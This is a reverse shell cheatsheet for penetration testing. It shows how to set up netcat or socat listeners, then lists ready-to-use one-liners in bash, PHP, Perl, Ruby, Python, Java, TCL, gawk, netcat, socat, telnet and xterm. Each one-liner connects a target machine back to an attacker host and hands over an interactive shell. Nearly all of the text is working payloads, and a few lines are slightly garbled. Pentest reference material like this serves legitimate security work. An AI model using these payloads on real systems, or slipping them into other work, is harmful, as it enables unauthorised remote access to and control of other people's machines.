Reverse Shell Cheatsheet

During penetration testing, we might be lucky enough to exploit a command execution vulnerability. Soon, we want and interactive shell to penetrate deeper. Some approach involving “login” mechanism, such as add new account / SSH key / .rhosts file. However if these approach is not viable then hop would be shell, either reverse shell or binding shell to a TCP port. As stated in title, we will discussing the former.

Below we curate reverse shells that use various programming language or tools on target machine.

Listening Home

Most network firewall egress filters allow

http (tcp port 80) https (tcp port 443) dns (tcp/udp port 53) smtp (tcp port 53) ping (icmp requests and echo replies)

While it’s not always be true, it can be our initial attempt to set listening socket to one of those ports. Remember that reverse shell need a “home” or something in our machine that listen and communicate with reverse shell.

The simplest trick in our disposal is using netcat to listen on socket. Most likely netcat is installed by default.

nc -vlp 13510

Or if we are usingsocat, we can use this.

socatREADLINE,history:/tmp/history.cmds TCP4-LISTEN:13510

or we can create a redirectory on public faced machine which will give the traffic to our system.

Reverse Shell Bash exec 5<>/dev/tcp/10.0.0.1/13510 cat <&5 | while read line; do $line 2>&5 >&5; done bash -i >& /dev/tcp/10.0.0.1/13510 0>&1 exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/10.0.0.1/13510; sh <&196 >&196 2>&196 TCLsh #!/usr/bin/tclsh set s [socket <IP> <PORT>]; while {42} { puts -nonewline $s "shell>"; flush $s; gets $s c; set e "exec $c"; if {![catch {set r [eval $e]} err]} { puts $s $r; } flush $s; } close $s; echo 'set s [socket <IP> <PORT>];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh php php -r '$sock=fsockopen("10.0.0.1",13510);exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",13510);shell_exec("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",13510);`/bin/sh -i <&3 >&3 2>&3`;' php -r '$sock=fsockopen("10.0.0.1",13510);system("/bin/sh -i <&3 >&3 2>&3");' php -r '$sock=fsockopen("10.0.0.1",13510);popen("/bin/sh -i <&3 >&3 2>&3");' Netcat nc -e /bin/sh 10.0.0.1 13510 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 13510 >/tmp/f /bin/sh | nc 10.0.0.1 13510 Socat socatTCP:10.0.0.1:13510 EXEC:/bin/bash socatOPENSSL:10.0.0.1:13510 EXEC:/bin/bash,pty Telnet rm -f /tmp/p; mknod /tmp/p p && telnet 10.0.0.1 0/tmp/p telnet 10.0.0.1 80 | /bin/bash | telnet 10.0.0.1 0 443 Perl perl -e 'use Socket;$i="10.0.0.1";$p=13510;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

for windows

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"10.0.0.1:13510");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",13510).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ruby -rsocket -e 'exit if fork;c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e "c=TCPSocket.new("10.0.0.1","13510");while(cmd=c.gets);IO.popen(cmd,'r'){|io|c.print io.read}end" Java r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/13510;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' Gawk #!/usr/bin/awk -f BEGIN { s = "/inet/tcp/0/10.0.0.1/13510" while(42) { do{ printf "shell>" |& s s |& getline c if(c){ while ((c |& getline) > 0) print $0 |& s close(c) } } while(c != "exit") close(s) } } awk 'BEGIN {s = "/inet/tcp/0/10.0.0.1/13510"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null xterm

one of the simplest reverse shell.

xterm -display :13510

to catch incoming forms of reverse shell in xterm session

xterm -display 10.0.0.1:1 Xnest :1